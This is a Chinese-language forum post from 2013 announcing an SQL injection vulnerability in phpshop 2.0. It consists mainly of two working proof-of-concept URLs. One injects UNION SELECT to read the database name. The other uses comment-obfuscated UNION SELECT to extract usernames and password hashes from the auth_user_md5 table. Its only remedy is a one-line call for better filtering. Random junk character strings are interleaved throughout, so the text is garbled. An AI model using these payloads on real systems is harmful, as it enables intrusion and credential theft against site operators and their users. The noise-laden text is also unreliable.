标题 : phpshop 2.0 SQL Injection Vulnerability, _- a7 O5 d; Z. @) t
) T" [( V, k& N3 O; ^作者 : By onestree
* E3 w0 W% `9 T$ _' \3 }; P下载地址 : http://code.google.com/p/phpshop/downloads/list6 _) g6 C% O7 K3 s
测试地址: windows 7 / ubuntu
1 S6 O. v0 [# E0 W6 t3 m
( q' F' e( |" @ G
4 d1 l [0 ~& ~SQLi p0c:+ ?3 l* A6 E( V! s1 E
$ }" z7 {$ C. }/ [: J
==================. z" b! K; R- J6 q% A1 G
- Y8 Z7 Y6 c" ?4 xhttp://www.xxx.com /phpshop 2.0/?page=admin/function_list&module_id=11'
' j+ V6 W4 A" T) |; N% hunion select 1,database(),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 --4 H" M1 H" C( ]9 [; ~" A3 T' E( Z
- V, _8 y# j2 @
http://localhost/phpshop 2.0/?page=shop/flypage&product_id=1087'/**/union/**/select/**/1,1,1,1,1,password,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,username/**/from/**/auth_user_md5--
4 ?8 ?$ I9 `2 L/ W/ ~
5 Z* y Z8 j \' O# ?; l8 n修复:0 H$ H& R1 C; }. ~& ?
加强过滤0 R* z* v; x# F/ w: Q
( ?; }" w8 b0 M1 X R
6 @+ H/ f8 @7 c A; @ |
发表于 2013-1-18 18:24:10
收藏
支持
反对